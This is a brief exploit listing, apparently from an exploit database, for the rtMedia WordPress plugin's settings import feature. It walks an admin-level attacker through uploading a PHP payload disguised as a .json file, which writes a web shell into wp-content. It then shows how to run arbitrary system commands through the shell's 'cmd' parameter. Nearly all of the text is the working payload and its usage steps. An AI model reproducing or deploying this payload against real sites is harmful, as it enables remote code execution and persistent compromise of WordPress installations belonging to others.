Share
## https://sploitus.com/exploit?id=WPEX-ID:DB5D41FC-BCD3-414F-AA99-54D5537007BC
1. As an admin, visit rtMedia > Settings > Export/Import.
2. Click the "Browse File" button beside "Import rtMedia Settings".
3. Upload a file with the extension `.json` and the following contents:

<?php file_put_contents(WP_CONTENT_DIR . '/shell.php', '<?php echo system($_GET["cmd"]);');

4. Visit `/wp-content/shell.php?cmd=id` to run arbitrary arbitrary commands.